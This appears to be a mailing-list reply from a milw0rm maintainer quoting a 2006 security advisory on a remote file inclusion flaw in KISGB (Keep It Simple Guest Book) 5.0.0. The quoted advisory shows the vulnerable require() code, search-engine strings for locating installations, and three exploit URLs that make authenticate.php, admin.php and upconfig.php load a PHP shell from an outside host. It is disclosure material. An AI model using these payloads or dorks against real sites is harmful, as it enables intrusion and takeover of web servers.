Dear 0o_zeus_o0 elitemexico.org, Thanks, this won't be going up since this was posted on milw0rm today around 4-6 hours ago for the original author mdx. http://www.milw0rm.com/exploits/2979. The only affected script is authenticate.php with the default_path_for_themes variable. The rest of them just include/require the vulnerable script. /str0ke On 12/22/06, 0o_zeus_o0 elitemexico.org <zeus.olimpusklan@xxxxxxxxx> wrote:
########################################################################### # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus@xxxxxxxxxxxxxxx # Website: www.diosdelared.com # Date: 22/12/06 # Risk: critical # Vendor Url: http://sourceforge.net/projects/kisgb , http://ravenphpscripts.com # Affected Software: Keep It Simple Guest Book # search: inurl:kisgb , intitle:KISGB # #Info: ################################################################## #Bug is risky by since it is possible to be included I cosay malisioso #that allows to see or to modify the archives #code: #if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme"); #else require("$path_to_themes/$theme"); ################################################################## # # #http://site/path/gbpath/authenticate.php?path_to_themes= http://shellsite.com/php.gif? # #http://site/path/gbpath/admin.php?default_path_for_themes=http://shellsite.com/php.gif? # #http://site/path/gbpath/upconfig.php?default_path_for_themes= http://shellsite.com/php.gif? ################################################################## #VULNERABLE VERSIONS ################################################################## # 5.0.0 # ################################################################## #Contact information #0o_zeus_o0 #zeus@xxxxxxxxxxxxxxx #www.diosdelared.com ################################################################## #greetz: S.S.M, sams, a mi beba #Original Advisory: http://diosdelared.com/15.txt ##################################################################
